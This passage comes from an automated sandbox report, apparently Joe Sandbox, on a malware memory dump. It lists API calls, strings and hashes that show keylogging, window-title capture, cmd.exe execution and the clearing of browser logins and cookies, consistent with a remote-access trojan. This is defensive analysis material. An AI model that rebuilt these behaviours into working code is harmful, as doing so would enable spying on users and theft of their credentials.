                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCreateValue
                                                                          • String ID: TUF
                                                                          • API String ID: 1818849710-3431404234
                                                                          • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                          • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                          • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                          • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                          APIs
                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExecuteShell
                                                                          • String ID: /C $cmd.exe$open
                                                                          • API String ID: 587946157-3896048727
                                                                          • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                          • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                          • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                          • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                          APIs
                                                                          • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                          • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                          • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                          • String ID: pth_unenc
                                                                          • API String ID: 3123878439-4028850238
                                                                          • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                          • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                          • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                          • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetCursorInfo$User32.dll
                                                                          • API String ID: 1646373207-2714051624
                                                                          • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                          • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                          • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                          • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                          • API String ID: 2574300362-1519888992
                                                                          • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                          • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                          • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                          • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __alldvrm$_strrchr
                                                                          • String ID:
                                                                          • API String ID: 1036877536-0
                                                                          • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                          • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                          • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                          • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                          • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                          • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                          • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3360349984-0
                                                                          • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                          • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                          • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                          • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                          APIs
                                                                          Strings
                                                                          • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                          • API String ID: 3472027048-1236744412
                                                                          • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                          • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                          • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                          • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                          APIs
                                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                          • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQuerySleepValue
                                                                          • String ID: @CG$exepath$BG
                                                                          • API String ID: 4119054056-3221201242
                                                                          • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                          • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                          • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                          • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                          APIs
                                                                            • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                            • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                            • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                          • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                          • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                          • String ID: [ $ ]
                                                                          • API String ID: 3309952895-93608704
                                                                          • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                          • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                          • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                          • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                                          • String ID:
                                                                          • API String ID: 3604237281-0
                                                                          • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                          • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                          • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                          • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                          • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                          • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                          • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                          • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                          • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                          • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                          APIs
                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                            • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                            • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                          • String ID:
                                                                          • API String ID: 737400349-0
                                                                          • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                          • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                          • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                          • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                          • String ID:
                                                                          • API String ID: 3919263394-0
                                                                          • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                          • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                          • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                          • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                          • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                          • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                          • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 4116985748-0
                                                                          • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                          • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                          • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                          • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleOpenProcess
                                                                          • String ID:
                                                                          • API String ID: 39102293-0
                                                                          • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                          • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                          • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                          • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorHandling__start
                                                                          • String ID: pow
                                                                          • API String ID: 3213639722-2276729525
                                                                          • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                          • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                          • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                          • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CountEventTick
                                                                          • String ID: >G
                                                                          • API String ID: 180926312-1296849874
                                                                          • Opcode ID: b0b89bb9bd8beed4b151c2787d9a90afc158e6c87396da72b4235c54ae8532de
                                                                          • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                          • Opcode Fuzzy Hash: b0b89bb9bd8beed4b151c2787d9a90afc158e6c87396da72b4235c54ae8532de
                                                                          • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $fD
                                                                          • API String ID: 1807457897-3092946448
                                                                          • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                          • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                          • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                          • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                          APIs
                                                                          • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ACP$OCP
                                                                          • API String ID: 0-711371036
                                                                          • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                          • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                          • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                          • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                          Strings
                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                          • API String ID: 481472006-1507639952
                                                                          • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                          • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                          • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                          • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                                          • API String ID: 481472006-2430845779
                                                                          • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                          • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                          • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                          • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                          APIs
                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExistsFilePath
                                                                          • String ID: alarm.wav$xIG
                                                                          • API String ID: 1174141254-4080756945
                                                                          • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                          • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                          • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                          • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                          APIs
                                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • CloseHandle.KERNEL32(?), ref: 0040A7CA
